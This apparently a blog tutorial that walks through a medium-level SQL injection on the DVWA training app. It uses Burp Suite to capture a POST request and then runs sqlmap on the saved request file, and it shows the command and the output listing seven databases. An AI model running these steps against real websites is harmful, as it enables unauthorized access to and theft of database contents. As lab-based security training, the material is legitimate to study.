Medium level Sql injection attack on website by sqlmap with burpsuite

We have seen a low level attack on a database by sqlmap Click here to see link. Now we will see medium level SQL injection attack.

First set DVWA for medium and go to SQL injection tab and send the request. See now request going in post method and we can’t append any string in URL in the type of cases we need to use an extra tool for capture request and repeat the same request with different data.

We will use Burp suite..

1. i have captured the rquest by set proxy..
2. Send repeater module and modify id and sent again.
3. it’s showing sql error that we are expecting.

but now we have challenged how can you pass an URL to sqlmap cause id is different position it’s not in URL.

we have to use another technique copy raw data and paste in a text file and save request.txt you can choose your owname.txt.

run below command.

sqlmap -r request.txt -p id –dbs

-r for request file
-p for parameter injectable
–dbs for database find

now let’s run

[23:50:03] [INFO] fetching database names
[23:50:03] [INFO] the SQL query used returns 7 entries
[23:50:03] [INFO] resumed: dvwa
[23:50:03] [INFO] resumed: information_schema
[23:50:03] [INFO] resumed: mysql
[23:50:03] [INFO] resumed: performance_schema
[23:50:03] [INFO] resumed: buyback
[23:50:03] [INFO] resumed: pk
[23:50:03] [INFO] resumed: wptest
available databases [7]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] buyback
[*] pk
[*] wptest

We successfully get it the databases . you can see detail how Send post request by sqlmap to Click here After we will follow the same step like the previous video Click here to see then we will get tables and table data of database.

See Next blogs Medium level Sql injection attack on website by sqlmap with burpsuite

How to attack by SQL injection in the website and hack SQL server by sqlmap.

Top useful sqlmap commands

How to Run a Security Scan and find Vulnerability in WordPress Site.

how to send sqlmap post request injection by sqlmap and capture request by burp suite

Leave a Reply

Your email address will not be published. Required fields are marked *